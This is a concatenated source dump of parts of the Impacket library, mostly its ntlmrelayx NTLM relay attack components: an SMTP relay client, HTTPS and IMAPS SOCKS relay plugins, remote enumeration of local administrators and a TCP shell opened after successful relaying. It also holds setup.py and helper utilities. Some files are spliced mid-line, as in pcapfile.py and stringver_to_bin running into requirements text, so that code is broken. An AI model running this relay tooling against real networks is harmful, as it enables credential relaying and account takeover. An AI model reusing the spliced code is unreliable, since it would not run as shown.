    (smtplib.SMTP, default port 25). No STARTTLS is issued in this class.

    The client gives up in initConnection() when the EHLO response does not
    contain 'AUTH NTLM', so a server that does not offer NTLM for SMTP is
    not usable through this class.
    """
    PLUGIN_NAME = "SMTP"

    def __init__(self, serverConfig, target, targetPort = 25, extendedSecurity=True ):
        ProtocolClient.__init__(self, serverConfig, target, targetPort, extendedSecurity)

    def initConnection(self):
        """Connect, send EHLO and check for NTLM support; returns True or False."""
        self.session = smtplib.SMTP(self.targetHost,self.targetPort)
        # Turn on to debug SMTP messages
        # self.session.debuglevel = 3
        self.session.ehlo()

        if 'AUTH NTLM' not in self.session.ehlo_resp:
            LOG.error('SMTP server does not support NTLM authentication!')
            return False
        return True

    def sendNegotiate(self,negotiateMessage):
        """Send AUTH NTLM plus the base64 negotiate message.

        Returns the parsed NTLMAuthChallenge, or False when the server does
        not answer 334. IndexError, KeyError and AttributeError raised while
        parsing are logged and re-raised.
        """
        negotiate = base64.b64encode(negotiateMessage)
        self.session.putcmd('AUTH NTLM')
        code, resp = self.session.getreply()
        if code != 334:
            LOG.error('SMTP Client error, expected 334 NTLM supported, got %d %s ' % (code, resp))
            return False
        else:
            self.session.putcmd(negotiate)
        try:
            # The reply code of the challenge line is not checked here.
            code, serverChallengeBase64 = self.session.getreply()
            serverChallenge = base64.b64decode(serverChallengeBase64)
            challenge = NTLMAuthChallenge()
            challenge.fromString(serverChallenge)
            return challenge
        except (IndexError, KeyError, AttributeError):
            LOG.error('No NTLM challenge returned from SMTP server')
            raise

    def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
        """Send the authenticate message; returns (None, NT status code).

        serverChallenge is accepted but not used in this method.
        """
        # A first byte equal to SPNEGO_NEG_TOKEN_RESP means the blob is
        # wrapped in SPNEGO; only the inner ResponseToken is sent.
        if unpack('B', authenticateMessageBlob[:1])[0] == SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
            respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
            token = respToken2['ResponseToken']
        else:
            token = authenticateMessageBlob
        auth = base64.b64encode(token)
        self.session.putcmd(auth)
        typ, data = self.session.getreply()
        # 235 is the SMTP reply for a successful authentication.
        if typ == 235:
            self.session.state = 'AUTH'
            return None, STATUS_SUCCESS
        else:
            LOG.error('SMTP: %s' % ''.join(data))
            return None, STATUS_ACCESS_DENIED

    def killConnection(self):
        """Close and drop the session, if there is one."""
        if self.session is not None:
            self.session.close()
            self.session = None

    def keepAlive(self):
        # Send a NOOP
        self.session.noop()
89 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/servers/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | from impacket.examples.ntlmrelayx.servers.httprelayserver import HTTPRelayServer
10 | from impacket.examples.ntlmrelayx.servers.smbrelayserver import SMBRelayServer
11 | from impacket.examples.ntlmrelayx.servers.wcfrelayserver import WCFRelayServer
12 | from impacket.examples.ntlmrelayx.servers.rawrelayserver import RAWRelayServer
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/servers/socksplugins/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | import os
10 | import sys
11 | import pkg_resources
12 |
# Set of SOCKS plugin classes, filled in by the discovery loop below.
SOCKS_RELAYS = set()

# Plugin discovery, executed when this package is imported: every '.py' file
# in the 'socksplugins' package directory whose name contains no '__' is
# imported and the class named by its PLUGIN_CLASS variable is registered.
#
# NOTE(review): importing a module runs its top-level code, so the contents
# of this directory are trusted implicitly. There is no error handling
# around the lookup either: a module without PLUGIN_CLASS makes the import
# of this package fail with AttributeError.
for file in pkg_resources.resource_listdir('impacket.examples.ntlmrelayx.servers', 'socksplugins'):
    if file.find('__') >= 0 or file.endswith('.py') is False:
        continue
    # This seems to be None in some case (py3 only)
    # __spec__ is py3 only though, but I haven't seen this being None on py2
    # so it should cover all cases.
    # NOTE(review): if __spec__ exists but is None, `.name` raises
    # AttributeError, which the handler below does not catch.
    try:
        package = __spec__.name # Python 3
    except NameError:
        package = __package__ # Python 2
    __import__(package + '.' + os.path.splitext(file)[0])
    module = sys.modules[package + '.' + os.path.splitext(file)[0]]
    pluginClass = getattr(module, getattr(module, 'PLUGIN_CLASS'))
    SOCKS_RELAYS.add(pluginClass)
29 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/servers/socksplugins/https.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # Socks Proxy for the HTTPS Protocol
11 | #
12 | # A simple SOCKS server that proxies a connection to relayed HTTPS connections
13 | #
14 | # Author:
15 | # Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
16 | #
17 | from impacket import LOG
18 | from impacket.examples.ntlmrelayx.servers.socksplugins.http import HTTPSocksRelay
19 | from impacket.examples.ntlmrelayx.utils.ssl import SSLServerMixin
20 | from OpenSSL import SSL
21 |
22 | # Besides using this base class you need to define one global variable when
23 | # writing a plugin:
24 | PLUGIN_CLASS = "HTTPSSocksRelay"
25 | EOL = '\r\n'
26 |
class HTTPSSocksRelay(SSLServerMixin, HTTPSocksRelay):
    """
    HTTPS flavour of the HTTP SOCKS plugin: the connection from the SOCKS
    client is wrapped in TLS before the HTTP plugin logic runs on it.
    wrapClientConnection() is presumably supplied by SSLServerMixin (not
    visible in this file).
    """
    PLUGIN_NAME = 'HTTPS Socks Plugin'
    PLUGIN_SCHEME = 'HTTPS'

    def __init__(self, targetHost, targetPort, socksSocket, activeRelays):
        HTTPSocksRelay.__init__(self, targetHost, targetPort, socksSocket, activeRelays)

    @staticmethod
    def getProtocolPort():
        """Return the TCP port this plugin is associated with (443)."""
        return 443

    def skipAuthentication(self):
        """Wrap the client side in TLS, then run the HTTP plugin's
        skipAuthentication(); returns its outcome as True or False."""
        LOG.debug('Wrapping client connection in TLS/SSL')
        self.wrapClientConnection()
        if not HTTPSocksRelay.skipAuthentication(self):
            # Shut down TLS connection
            self.socksSocket.shutdown()
            return False
        return True

    def tunnelConnection(self):
        """Forward requests and responses until the client closes the TLS
        session. Only SSL.ZeroReturnError ends the loop quietly; any other
        exception propagates to the caller."""
        while True:
            try:
                data = self.socksSocket.recv(self.packetSize)
            except SSL.ZeroReturnError:
                # The SSL connection was closed, return
                return
            # Pass the request to the server
            tosend = self.prepareRequest(data)
            self.relaySocket.send(tosend)
            # Send the response back to the client
            self.transferResponse()
59 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/servers/socksplugins/imaps.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # Socks Proxy for the IMAPS Protocol
11 | #
12 | # A simple SOCKS server that proxies a connection to relayed IMAPS connections
13 | #
14 | # Author:
15 | # Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
16 | #
17 | from impacket import LOG
18 | from impacket.examples.ntlmrelayx.servers.socksplugins.imap import IMAPSocksRelay
19 | from impacket.examples.ntlmrelayx.utils.ssl import SSLServerMixin
20 | from OpenSSL import SSL
21 |
# Plugin contract: in addition to subclassing the relay base class, every
# plugin module has to define this one global naming its relay class.
PLUGIN_CLASS = "IMAPSSocksRelay"
EOL = '\r\n'


class IMAPSSocksRelay(SSLServerMixin, IMAPSocksRelay):
    """SOCKS plugin that proxies a SOCKS client onto a relayed IMAPS session.

    The client-facing side is wrapped in TLS by
    SSLServerMixin.wrapClientConnection(); the IMAP handling itself is
    inherited from the plain-IMAP relay plugin.
    """
    PLUGIN_NAME = 'IMAPS Socks Plugin'
    PLUGIN_SCHEME = 'IMAPS'

    def __init__(self, targetHost, targetPort, socksSocket, activeRelays):
        IMAPSocksRelay.__init__(self, targetHost, targetPort, socksSocket, activeRelays)

    @staticmethod
    def getProtocolPort():
        """Return the TCP port this plugin is registered for (993)."""
        return 993

    def skipAuthentication(self):
        """Wrap the client socket in TLS, then run the IMAP plugin's handling.

        Returns False when the inherited skipAuthentication() fails or raises
        (the exception text is only logged at debug level); returns True after
        pointing relaySocket at the session's SSL object.
        """
        LOG.debug('Wrapping IMAP client connection in TLS/SSL')
        self.wrapClientConnection()
        try:
            authenticated = IMAPSocksRelay.skipAuthentication(self)
            if not authenticated:
                # Shut down TLS connection
                self.socksSocket.shutdown()
                return False
        except Exception as e:
            LOG.debug('IMAPS: %s' % str(e))
            return False
        # Change our outgoing socket to the SSL object of IMAP4_SSL
        self.relaySocket = self.session.sslobj
        return True

    def tunnelConnection(self):
        """Forward client commands until the client disconnects or processing stops.

        After the loop, if a tag was seen, the relayed session is left in a
        reusable state (IDLE ended, mailbox closed when requested) and the
        next tag number is stored on the session.
        """
        keyword, tag = '', ''
        while True:
            try:
                chunk = self.socksSocket.recv(self.packetSize)
            except SSL.ZeroReturnError:
                # The SSL connection was closed, stop tunnelling
                break
            outcome = self.processTunnelData(keyword, tag, chunk)
            # False means "stop"; anything else is a (keyword, tag) tuple
            if outcome is False:
                break
            keyword, tag = outcome

        if tag == '':
            return

        # Store the tag in the session so we can continue
        tag = int(tag)
        if self.idleState is True:
            self.relaySocket.sendall('DONE%s' % EOL)
            self.relaySocketFile.readline()

        if self.shouldClose:
            tag += 1
            self.relaySocket.sendall('%s CLOSE%s' % (tag, EOL))
            self.relaySocketFile.readline()

        self.session.tagnum = tag + 1
82 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/utils/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | pass
10 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/utils/enum.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # Config utilities
11 | #
12 | # Helpful enum methods for discovering local admins through SAMR and LSAT
13 | #
14 | # Author:
15 | # Ronnie Flathers / @ropnop
16 | #
17 | from impacket.dcerpc.v5 import transport, lsat, samr, lsad
18 | from impacket.dcerpc.v5.dtypes import MAXIMUM_ALLOWED
19 |
20 |
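class EnumLocalAdmins:
    """List the members of the BUILTIN Administrators alias on a remote host.

    Works over an already-established SMB connection: SAMR (\\pipe\\samr) is
    used to read the alias members as SIDs, LSA (\\pipe\\lsarpc) to translate
    those SIDs to DOMAIN\\name strings.

    Defender note: both calls are ordinary remote SAM/LSA queries. On Windows
    the SAMR side can be limited with the "Network access: Restrict clients
    allowed to make remote calls to SAM" policy.
    """

    def __init__(self, smbConnection):
        """:param smbConnection: authenticated SMB connection reused for both pipes."""
        self.__smbConnection = smbConnection
        self.__samrBinding = r'ncacn_np:445[\pipe\samr]'
        self.__lsaBinding = r'ncacn_np:445[\pipe\lsarpc]'

    def __getDceBinding(self, strBinding):
        """Build a DCE/RPC object for ``strBinding`` on top of the SMB connection."""
        rpc = transport.DCERPCTransportFactory(strBinding)
        rpc.set_smb_connection(self.__smbConnection)
        return rpc.get_dce_rpc()

    def getLocalAdmins(self):
        """Return ``(sids, names)``: canonical SID strings and their resolved names."""
        adminSids = self.__getLocalAdminSids()
        adminNames = self.__resolveSids(adminSids)
        return adminSids, adminNames

    def __getLocalAdminSids(self):
        """Return the canonical SID strings of alias 544 in the 'Builtin' domain."""
        dce = self.__getDceBinding(self.__samrBinding)
        dce.connect()
        # try/finally: the RPC transport is released even when one of the SAMR
        # calls raises (e.g. access denied), instead of leaking it.
        try:
            dce.bind(samr.MSRPC_UUID_SAMR)
            resp = samr.hSamrConnect(dce)
            serverHandle = resp['ServerHandle']

            resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle, 'Builtin')
            resp = samr.hSamrOpenDomain(dce, serverHandle=serverHandle, domainId=resp['DomainId'])
            domainHandle = resp['DomainHandle']
            # 544 is the well-known RID of BUILTIN\Administrators
            resp = samr.hSamrOpenAlias(dce, domainHandle, desiredAccess=MAXIMUM_ALLOWED, aliasId=544)
            resp = samr.hSamrGetMembersInAlias(dce, resp['AliasHandle'])
            return [member['SidPointer'].formatCanonical() for member in resp['Members']['Sids']]
        finally:
            dce.disconnect()

    def __resolveSids(self, sids):
        """Translate ``sids`` to ``DOMAIN\\name`` strings via LsarLookupSids."""
        dce = self.__getDceBinding(self.__lsaBinding)
        dce.connect()
        try:
            dce.bind(lsat.MSRPC_UUID_LSAT)
            resp = lsad.hLsarOpenPolicy2(dce, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES)
            policyHandle = resp['PolicyHandle']
            resp = lsat.hLsarLookupSids(dce, policyHandle, sids, lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta)
            domains = resp['ReferencedDomains']['Domains']
            # Each translated name carries an index into the referenced-domains list
            return ["{}\\{}".format(domains[item['DomainIndex']]['Name'], item['Name'])
                    for item in resp['TranslatedNames']['Names']]
        finally:
            dce.disconnect()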
67 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/utils/ssl.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # SSL utilities
11 | #
12 | # Various functions and classes for SSL support:
13 | # - generating certificates
14 | # - creating SSL capable SOCKS protocols
15 | #
16 | # Most of the SSL generation example code comes from the pyopenssl examples
17 | # https://github.com/pyca/pyopenssl/blob/master/examples/certgen.py
18 | #
19 | # Made available under the Apache license by the pyopenssl team
20 | # See https://github.com/pyca/pyopenssl/blob/master/LICENSE
21 | #
22 | # Author:
23 | # Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
24 | #
25 | from OpenSSL import crypto, SSL
26 | from impacket import LOG
27 |
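# This certificate is not supposed to be exposed on the network
# but only used for the local SOCKS plugins
# therefore, for now we don't bother with a CA and with hosts/hostnames matching
def generateImpacketCert(certname='/tmp/impacket.crt'):
    """Generate a self-signed RSA-2048 certificate and write key + cert to one PEM file.

    The certificate has CN 'impacket', is valid for five years from now and is
    signed with SHA-256 by its own key.

    :param certname: path of the PEM file that receives the private key
        followed by the certificate. A file created here gets mode 0600; an
        already existing file keeps whatever mode it had.

    Security note: the default path is a fixed name in the shared /tmp
    directory. Callers on multi-user hosts should prefer passing a path inside
    a directory only they can write to.
    """
    # Local import: the file-level imports of this module do not include os.
    import os

    # Create a private key
    pkey = crypto.PKey()
    pkey.generate_key(crypto.TYPE_RSA, 2048)

    # Create the certificate
    cert = crypto.X509()
    cert.gmtime_adj_notBefore(0)
    # Valid for 5 years
    cert.gmtime_adj_notAfter(60*60*24*365*5)
    subj = cert.get_subject()
    subj.CN = 'impacket'
    cert.set_pubkey(pkey)
    cert.sign(pkey, "sha256")

    # Key and certificate go into the same file. The file holds a private key,
    # so it is created owner-read/write only instead of with the umask default
    # that a plain open(certname, 'w') would give it.
    fd = os.open(certname, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, 'w') as certfile:
        certfile.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, pkey).decode('utf-8'))
        certfile.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert).decode('utf-8'))
    LOG.debug('Wrote certificate to %s' % certname)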
50 |
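# Class to wrap the client socket in SSL when serving as a SOCKS server
class SSLServerMixin(object):
    """Mixin that turns ``self.socksSocket`` into a server-side TLS socket."""

    def wrapClientConnection(self, cert='/tmp/impacket.crt'):
        """Wrap ``self.socksSocket`` in a pyOpenSSL connection in accept state.

        :param cert: PEM file holding both the private key and the certificate.
            When loading it fails with SSL.Error, a new self-signed certificate
            is generated at that path and loaded instead.
        """
        # Create a context, we don't really care about the SSL/TLS
        # versions used since it is only intended for local use and thus
        # doesn't have to be super-secure.
        # NOTE(review): 'ALL:@SECLEVEL=0' removes OpenSSL's security-level
        # floor, so legacy ciphers and key sizes are accepted. That is only
        # tolerable while the SOCKS listener stays on a local interface; do
        # not reuse this context for a network-facing service.
        ctx = SSL.Context(SSL.TLS_METHOD)
        ctx.set_cipher_list('ALL:@SECLEVEL=0'.encode('utf-8'))
        try:
            ctx.use_privatekey_file(cert)
            ctx.use_certificate_file(cert)
        except SSL.Error:
            # Report the path actually used (the old message always named the
            # default path, even when the caller passed a different one).
            LOG.info('SSL requested - generating self-signed certificate in %s' % cert)
            generateImpacketCert(cert)
            ctx.use_privatekey_file(cert)
            ctx.use_certificate_file(cert)

        sslSocket = SSL.Connection(ctx, self.socksSocket)
        sslSocket.set_accept_state()

        # Now set this property back to the SSL socket instead of the regular one
        self.socksSocket = sslSocket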
74 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/ntlmrelayx/utils/tcpshell.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # TCP interactive shell
11 | #
12 | # Launches a TCP shell for interactive use of clients
13 | # after successful relaying
14 | #
15 | # Author:
16 | # Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
17 | #
18 | import socket
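#Default listen port
port = 11000
class TcpShell:
    """One-shot TCP listener on localhost exposing file-like stdin/stdout.

    Each instance takes the next port from the module-level counter, starting
    at 11000.

    Security note: the listener performs no authentication and the port
    numbers are predictable. Whatever local process connects first gets the
    shell, so this is only appropriate on a single-user host.
    """

    def __init__(self):
        global port
        self.port = port
        #Increase the default port for the next attack
        port += 1

    def listen(self):
        """Block until one client connects, then expose it as stdin/stdout."""
        #Set up the listening socket
        serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            #Bind on localhost
            serversocket.bind(('127.0.0.1', self.port))
            #Don't allow a backlog
            serversocket.listen(0)
            self.connection, host = serversocket.accept()
        finally:
            # Only one client is ever served, so the listening socket is
            # released right away (also when bind/accept fails) instead of
            # staying open until garbage collection.
            serversocket.close()
        #Create file objects from the socket
        self.stdin = self.connection.makefile("r")
        self.stdout = self.connection.makefile("w")

    def close(self):
        """Close both file objects and the accepted connection."""
        self.stdout.close()
        self.stdin.close()
        self.connection.close()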
44 |
--------------------------------------------------------------------------------
/impacket/impacket/examples/utils.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | # Utility and helper functions for the example scripts
11 | #
12 | # Author:
13 | # Martin Gallo (@martingalloar)
14 | #
15 | import re
16 |
17 |
# Regular expression to parse target information.
# Capture groups, in order: domain (text before '/'), username, password
# (text after ':', up to the first '@') and the remainder of the string.
# The whole "domain/username:password@" prefix is optional.
target_regex = re.compile(r"(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)")


# Regular expression to parse credentials information.
# Capture groups, in order: domain (text before '/'), username and password
# (everything after the first ':').
credential_regex = re.compile(r"(?:(?:([^/:]*)/)?([^:]*)(?::(.*))?)?")
24 |
25 |
def parse_target(target):
    """ Helper function to parse target information. The expected format is:

    [[DOMAIN/]USERNAME[:PASSWORD]@]HOSTNAME

    Parts that are absent come back as empty strings. The returned password
    is plaintext, so the tuple should not be written to logs as-is.

    :param target: target to parse
    :type target: string

    :return: tuple of domain, username, password and remote name or IP address
    :rtype: (string, string, string, string)
    """
    domain, username, password, remote_name = target_regex.match(target).groups('')

    # The regex stops the password at the first '@'. If more '@' follow, the
    # host is only what comes after the last one; the rest belongs to the password.
    if '@' in remote_name:
        password_tail, _, host = remote_name.rpartition('@')
        password = password + '@' + password_tail
        remote_name = host

    return domain, username, password, remote_name
45 |
46 |
def parse_credentials(credentials):
    """ Helper function to parse credentials information. The expected format is:

    [DOMAIN/]USERNAME[:PASSWORD]

    Parts that are absent come back as empty strings.

    :param credentials: credentials to parse
    :type credentials: string

    :return: tuple of domain, username and password
    :rtype: (string, string, string)
    """
    # groups('') substitutes '' for every group that did not take part in the match
    parts = credential_regex.match(credentials).groups('')
    return parts[0], parts[1], parts[2]
61 |
--------------------------------------------------------------------------------
/impacket/impacket/krb5/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | pass
10 |
--------------------------------------------------------------------------------
/impacket/impacket/ldap/__init__.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Description:
10 | pass
11 |
--------------------------------------------------------------------------------
/impacket/impacket/pcapfile.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 |
10 | from impacket import structure
11 |
12 | O_ETH = 0
13 | O_IP = 1
14 | O_ARP = 1
15 | O_UDP = 2
16 | O_TCP = 2
17 | O_ICMP = 2
18 | O_UDP_DATA = 3
19 | O_ICMP_DATA = 3
20 |
21 | MAGIC = '"\xD4\xC3\xB2\xA1'
22 |
23 | class PCapFileHeader(structure.Structure):
24 | structure = (
25 | ('magic', MAGIC),
26 | ('versionMajor', 'HHL', uuid[8:16])
37 | return '%08X-%04X-%04X-%04X-%04X%08X' % (uuid1, uuid2, uuid3, uuid4, uuid5, uuid6)
38 |
39 |
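def string_to_bin(uuid):
    """Convert a textual UUID to its 16-byte binary form.

    :param uuid: either 32 hex digits without dashes, or the dashed
        00000000-0000-0000-0000-000000000000 form.
    :return: the 16 raw bytes.
    """
    # If a UUID in the 00000000000000000000000000000000 format, let's return bytes as is
    if '-' not in uuid:
        return binascii.unhexlify(uuid)

    # If a UUID in the 00000000-0000-0000-0000-000000000000 format, parse it as Variant 2 UUID
    # The first three components of the UUID are little-endian, and the last two are big-endian
    matches = re.match(r"([\dA-Fa-f]{8})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})-([\dA-Fa-f]{4})([\dA-Fa-f]{8})",
                       uuid)
    (uuid1, uuid2, uuid3, uuid4, uuid5, uuid6) = [int(x, 16) for x in matches.groups()]
    # The listing lost the format strings here and dropped the first three
    # fields; restored to match the byte order described above.
    uuid = pack('<LHH', uuid1, uuid2, uuid3)
    uuid += pack('>HHL', uuid4, uuid5, uuid6)
    return uuid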
53 |
54 |
55 | def stringver_to_bin(s):
56 | (maj, min) = s.split('.')
57 | return pack('=0.2.3
5 | pycryptodomex
6 | pyOpenSSL>=21.0.0
7 | ldap3>=2.5,!=2.5.2,!=2.5.0,!=2.6
8 | ldapdomaindump>=0.9.0
9 | flask>=1.0
10 | pyreadline;sys_platform == 'win32'
11 | dsinternals
12 |
--------------------------------------------------------------------------------
/impacket/setup.cfg:
--------------------------------------------------------------------------------
1 | [egg_info]
2 | tag_build =
3 | tag_date = 0
4 |
5 |
--------------------------------------------------------------------------------
/impacket/setup.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # Setup file
12 | #
13 | import glob
14 | import os
15 | import platform
16 |
17 | from setuptools import setup
18 | from subprocess import *
19 |
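PACKAGE_NAME = "impacket"

VER_MAJOR = 0
VER_MINOR = 11
VER_MAINT = 0
VER_PREREL = ""

# Derive a local version suffix ("+<commit date>.<commit time>.<short hash>")
# when setup.py runs inside a git checkout; otherwise leave it empty.
# The commands are fixed argument lists run without a shell, so nothing is
# re-interpreted by /bin/sh or cmd.exe. `git` is still resolved through the
# PATH of whoever runs setup.py.
# Note: the setup() call further down builds its version string from
# VER_MAJOR/VER_MINOR/VER_MAINT only.
try:
    # DEVNULL (exported by `from subprocess import *`) replaces the
    # open(os.devnull, 'w') handle that was never closed.
    if call(["git", "branch"], stderr=STDOUT, stdout=DEVNULL) == 0:
        p = Popen(["git", "log", "-1", "--format=%cd", "--date=format:%Y%m%d.%H%M%S"],
                  stdin=PIPE, stderr=PIPE, stdout=PIPE)
        (outstr, __) = p.communicate()
        (VER_CDATE, VER_CTIME) = outstr.strip().decode("utf-8").split('.')

        p = Popen(["git", "rev-parse", "--short", "HEAD"], stdin=PIPE, stderr=PIPE, stdout=PIPE)
        (outstr, __) = p.communicate()
        VER_CHASH = outstr.strip().decode("utf-8")

        VER_LOCAL = "+{}.{}.{}".format(VER_CDATE, VER_CTIME, VER_CHASH)
    else:
        VER_LOCAL = ""
except Exception:
    # git missing, not a repository, or unexpected output: no local suffix
    VER_LOCAL = ""

# Documentation files are installed under share/doc/<package> except on macOS
if platform.system() != 'Darwin':
    data_files = [(os.path.join('share', 'doc', PACKAGE_NAME), ['README.md', 'LICENSE']+glob.glob('doc/*'))]
else:
    data_files = []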
46 |
47 |
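def read(fname):
    """Return the text of ``fname``, resolved relative to this file's directory."""
    # Context manager so the handle is closed deterministically instead of
    # being left to the garbage collector.
    with open(os.path.join(os.path.dirname(__file__), fname)) as handle:
        return handle.read()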
50 |
51 |
# Package metadata and install configuration.
setup(
    name=PACKAGE_NAME,
    # Only MAJOR.MINOR.MAINT is used here; VER_PREREL and the git-derived
    # VER_LOCAL computed above are not part of the version string.
    version="{}.{}.{}".format(VER_MAJOR, VER_MINOR, VER_MAINT),
    description="Network protocols Constructors and Dissectors",
    url="https://www.coresecurity.com",
    author="SecureAuth Corporation",
    maintainer="Fortra",
    license="Apache modified",
    long_description=read('README.md'),
    long_description_content_type="text/markdown",
    platforms=["Unix", "Windows"],
    packages=['impacket', 'impacket.dcerpc', 'impacket.examples', 'impacket.dcerpc.v5', 'impacket.dcerpc.v5.dcom',
              'impacket.krb5', 'impacket.ldap', 'impacket.examples.ntlmrelayx',
              'impacket.examples.ntlmrelayx.clients', 'impacket.examples.ntlmrelayx.servers',
              'impacket.examples.ntlmrelayx.servers.socksplugins', 'impacket.examples.ntlmrelayx.utils',
              'impacket.examples.ntlmrelayx.attacks', 'impacket.examples.ntlmrelayx.attacks.httpattacks'],
    # Every examples/*.py file is installed as an executable script
    scripts=glob.glob(os.path.join('examples', '*.py')),
    data_files=data_files,
    # Dependencies carry lower bounds or exclusions only (several have no
    # constraint at all), so the installer picks the newest matching release
    # at install time. Use a lock/constraints file with hashes where
    # reproducible installs matter.
    install_requires=['pyasn1>=0.2.3', 'pycryptodomex', 'pyOpenSSL>=21.0.0', 'six', 'ldap3>=2.5,!=2.5.2,!=2.5.0,!=2.6',
                      'ldapdomaindump>=0.9.0', 'flask>=1.0', 'future', 'charset_normalizer', 'dsinternals'],
    # NOTE(review): the extra is keyed on 'pyreadline' with a win32 marker and
    # an empty requirement list - confirm this still pulls in pyreadline on
    # Windows as intended.
    extras_require={'pyreadline:sys_platform=="win32"': [],
                    },
    classifiers=[
        "Programming Language :: Python :: 3.10",
        "Programming Language :: Python :: 3.9",
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.6",
    ]
)
82 |
--------------------------------------------------------------------------------
/impacket/tests/ImpactPacket/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 |
--------------------------------------------------------------------------------
/impacket/tests/ImpactPacket/test_IP6.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from impacket import IP6, ImpactDecoder
12 |
13 |
